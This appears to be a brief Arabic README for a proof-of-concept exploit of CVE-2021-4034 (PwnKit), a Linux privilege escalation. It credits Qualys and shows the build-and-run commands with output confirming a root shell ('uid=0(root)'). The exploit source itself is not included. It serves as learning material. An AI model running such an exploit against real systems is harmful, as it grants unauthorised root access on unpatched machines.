
إثبات مفهوم لاستغلال CVE-2021-4034 (PwnKit) الذي يرفع الامتيازات إلى صلاحيات الجذر (root) على أنظمة لينكس المعرضة للخطر.
من الواضح أنه ليس أصليًا. أعدت صياغته لفهم ما يحدث. الفضل يعود إلى https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt لاكتشاف الثغرة!
PoCs أخرى ساعدتني في فهم الاستغلال:
make
❯ ./main
LOADED!
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root)